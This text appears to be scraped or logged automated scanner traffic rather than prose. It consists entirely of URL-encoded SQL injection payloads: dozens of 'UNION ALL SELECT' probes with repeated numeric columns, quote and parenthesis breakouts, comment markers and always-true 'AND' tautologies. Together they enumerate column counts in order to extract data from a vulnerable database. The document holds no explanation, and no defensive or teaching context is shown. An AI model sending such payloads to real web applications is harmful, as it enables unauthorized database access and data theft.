-8533%27%20UNION%20ALL%20SELECT%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%2C%203860%23%20AND%20%27HWIq%27%3D%27HWIq -8407%27%20UNION%20ALL%20SELECT%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%2C%209088%23%20AND%20%27aHUz%27%3D%27aHUz -7397%27%20UNION%20ALL%20SELECT%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%23%20AND%20%27xqDZ%27%3D%27xqDZ -1875%27%20UNION%20ALL%20SELECT%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%2C%204165%23%20AND%20%27BjBx%27%3D%27BjBx -8600%27%20UNION%20ALL%20SELECT%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%23%20AND%20%27DnnX%27%3D%27DnnX -7175%27%20UNION%20ALL%20SELECT%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%2C%205849%23%20AND%20%27MnWw%27%3D%27MnWw -3289%27%20UNION%20ALL%20SELECT%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%2C%205047%23%20AND%20%27VuGC%27%3D%27VuGC -6638%27%29%20UNION%20ALL%20SELECT%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%23%20AND%20%28%27NDyx%27%20LIKE%20%27NDyx -1932%27%29%20UNION%20ALL%20SELECT%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%23%20AND%20%28%27uUwi%27%20LIKE%20%27uUwi -7850%27%29%20UNION%20ALL%20SELECT%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%23%20AND%20%28%27QXxS%27%20LIKE%20%27QXxS -2617%27%29%20UNION%20ALL%20SELECT%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%2C%204325%23%20AND%20%28%27rzzN%27%20LIKE%20%27rzzN -8950%27%29%20UNION%20ALL%20SELECT%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%23%20AND%20%28%27OpgB%27%20LIKE%20%27OpgB -2878%27%29%20UNION%20ALL%20SELECT%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%2C%201605%23%20AND%20%28%27KKVm%27%20LIKE%20%27KKVm -1674%27%29%20UNION%20ALL%20SELECT%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%2C%208122%23%20AND%20%28%27OPrE%27%20LIKE%20%27OPrE -7728%27%29%20UNION%20ALL%20SELECT%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%23%20AND%20%28%27tmvl%27%20LIKE%20%27tmvl -5977%27%29%20UNION%20ALL%20SELECT%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%2C%204411%23%20AND%20%28%27QniB%27%20LIKE%20%27QniB -8615%27%29%20UNION%20ALL%20SELECT%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%23%20AND%20%28%27KKLw%27%20LIKE%20%27KKLw -9379%27%29%29%20UNION%20ALL%20SELECT%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%23%20AND%20%28%28%27MDau%27%20LIKE%20%27MDau -5839%27%29%29%20UNION%20ALL%20SELECT%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%23%20AND%20%28%28%27AYAL%27%20LIKE%20%27AYAL -9731%27%29%29%20UNION%20ALL%20SELECT%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%2C%202117%23%20AND%20%28%28%27hGSs%27%20LIKE%20%27hGSs -9843%27%29%29%20UNION%20ALL%20SELECT%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%23%20AND%20%28%28%27OiMo%27%20LIKE%20%27OiMo -1896%27%29%29%20UNION%20ALL%20SELECT%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%23%20AND%20%28%28%27UoMD%27%20LIKE%20%27UoMD -4782%27%29%29%20UNION%20ALL%20SELECT%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%2C%202077%23%20AND%20%28%28%27ytEu%27%20LIKE%20%27ytEu -8039%27%29%29%20UNION%20ALL%20SELECT%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%2C%206819%23%20AND%20%28%28%27xaIF%27%20LIKE%20%27xaIF -2806%27%29%29%20UNION%20ALL%20SELECT%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%2C%208563%23%20AND%20%28%28%27tNqm%27%20LIKE%20%27tNqm -5980%27%29%29%20UNION%20ALL%20SELECT%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%23%20AND%20%28%28%27dAMy%27%20LIKE%20%27dAMy -5809%27%29%29%20UNION%20ALL%20SELECT%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%23%20AND%20%28%28%27zMCF%27%20LIKE%20%27zMCF -4647%27%29%29%29%20UNION%20ALL%20SELECT%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%23%20AND%20%28%28%28%27FJED%27%20LIKE%20%27FJED -1031%27%29%29%29%20UNION%20ALL%20SELECT%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%2C%209383%23%20AND%20%28%28%28%27NfzJ%27%20LIKE%20%27NfzJ -4730%27%29%29%29%20UNION%20ALL%20SELECT%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%23%20AND%20%28%28%28%27PIJk%27%20LIKE%20%27PIJk -5439%27%29%29%29%20UNION%20ALL%20SELECT%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%23%20AND%20%28%28%28%27kgEC%27%20LIKE%20%27kgEC -8235%27%29%29%29%20UNION%20ALL%20SELECT%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%23%20AND%20%28%28%28%27WMZD%27%20LIKE%20%27WMZD -6008%27%29%29%29%20UNION%20ALL%20SELECT%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%23%20AND%20%28%28%28%27TsMC%27%20LIKE%20%27TsMC -4175%27%29%29%29%20UNION%20ALL%20SELECT%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%2C%205468%23%20AND%20%28%28%28%27RUgu%27%20LIKE%20%27RUgu -2969%27%29%29%29%20UNION%20ALL%20SELECT%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%23%20AND%20%28%28%28%27tvBK%27%20LIKE%20%27tvBK -8559%27%29%29%29%20UNION%20ALL%20SELECT%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%2C%208824%23%20AND%20%28%28%28%27SXHG%27%20LIKE%20%27SXHG -4194%27%29%29%29%20UNION%20ALL%20SELECT%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%2C%201422%23%20AND%20%28%28%28%27lEna%27%20LIKE%20%27lEna -8086%27%20UNION%20ALL%20SELECT%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%23%20AND%20%27FWen%27%20LIKE%20%27FWen -8171%27%20UNION%20ALL%20SELECT%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%2C%209272%23%20AND%20%27gacI%27%20LIKE%20%27gacI -9002%27%20UNION%20ALL%20SELECT%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%23%20AND%20%27dNkc%27%20LIKE%20%27dNkc -2474%27%20UNION%20ALL%20SELECT%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%23%20AND%20%27stwq%27%20LIKE%20%27stwq -8113%27%20UNION%20ALL%20SELECT%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%2C%209001%23%20AND%20%27gUQh%27%20LIKE%20%27gUQh -1419%27%20UNION%20ALL%20SELECT%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%2C%204972%23%20AND%20%27BpGz%27%20LIKE%20%27BpGz -5389%27%20UNION%20ALL%20SELECT%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%2C%205178%23%20AND%20%27jvYe%27%20LIKE%20%27jvYe -1331%27%20UNION%20ALL%20SELECT%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%23%20AND%20%27XUFX%27%20LIKE%20%27XUFX -5540%27%20UNION%20ALL%20SELECT%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%23%20AND%20%27iIpq%27%20LIKE%20%27iIpq 